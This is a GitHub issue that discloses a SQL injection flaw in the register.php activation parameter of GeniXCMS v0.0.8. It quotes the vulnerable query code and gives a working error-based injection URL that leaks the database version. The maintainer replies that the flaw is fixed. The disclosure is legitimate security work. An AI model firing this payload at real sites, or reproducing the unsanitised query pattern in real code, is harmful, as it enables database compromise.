Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in register.php GeniXCMS v0.0.8(latest version) #69

Closed
Dliv3 opened this issue Jan 20, 2017 · 1 comment
Closed

SQL injection in register.php GeniXCMS v0.0.8(latest version) #69

Dliv3 opened this issue Jan 20, 2017 · 1 comment
Labels

Comments

@Dliv3
Copy link

Dliv3 commented Jan 20, 2017

/register.php

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

the activation param leads to sql injection vulnerability
POC:

http://127.0.0.1/GeniXCMS/register.php?activation=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23

We'll find that the database version in the response page, which proved the vulnerability exist.

By the way, if you can help me apply for a CVE-ID, i will be very grateful.XD

@semplon
Copy link
Owner

semplon commented Jan 20, 2017

this has been fixed with this commit. https://github.com/semplon/GeniXCMS/blob/master/register.php#L119

thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants